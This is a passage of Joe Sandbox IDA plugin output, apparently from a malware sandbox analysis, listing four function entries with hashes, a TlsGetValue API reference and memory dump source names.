                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: e12e2ecdf7ca73aabfad501042ddd7407fb52952015119a37efaedf7b43f0b1d
                                                                                                                                                                      • Instruction ID: 6ea7aae9919c4dfe7007963bdc710e508f117af73e5110a105a527806eb3f607
                                                                                                                                                                      • Opcode Fuzzy Hash: e12e2ecdf7ca73aabfad501042ddd7407fb52952015119a37efaedf7b43f0b1d
                                                                                                                                                                      • Instruction Fuzzy Hash: BED0C739504110BFCF016774AC0546A7796AB55334F708A18F575C10A0D77589105F11
                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00184C69
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: f41aef1a6f77089cca41d83278430074978118d518e661e208801593f4ae496e
                                                                                                                                                                      • Instruction ID: fa43d47bb399af6dc6262ec9c205be5d434b1ff1e133319f74b1e7c4159ef123
                                                                                                                                                                      • Opcode Fuzzy Hash: f41aef1a6f77089cca41d83278430074978118d518e661e208801593f4ae496e
                                                                                                                                                                      • Instruction Fuzzy Hash: 77D01234206111BFDF016774AD489697796AB94730FB1CB1CF971C11E0DB34DA009F11
                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00183D42
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: 8e4be650e635880c8fcf2305ec91b771c94007f57ece875d773499f801ee03f8
                                                                                                                                                                      • Instruction ID: 25f422ffce83fbdae5abd2d2ae42526858f383edc0e68abdac70b8b7d38edb5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e4be650e635880c8fcf2305ec91b771c94007f57ece875d773499f801ee03f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 6AD0C934204100BFCF456BB4EC488AA77A2EF94730FA0CF18F575C20A0C7358A10AF12
                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00183DB5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: c30d660c206146c0a5c4b1f82f83852cdf5fb601dcc83f7e218f451a7802a52c
                                                                                                                                                                      • Instruction ID: 21ae01de940dacb3c4863036265a8439752d98259736261b24f0eca26b1e0820
                                                                                                                                                                      • Opcode Fuzzy Hash: c30d660c206146c0a5c4b1f82f83852cdf5fb601dcc83f7e218f451a7802a52c
                                                                                                                                                                      • Instruction Fuzzy Hash: 72D01234104101ABCF4577B4ED088BD7AA2BB54360B904F58F9B1C11F0C735CA44AF11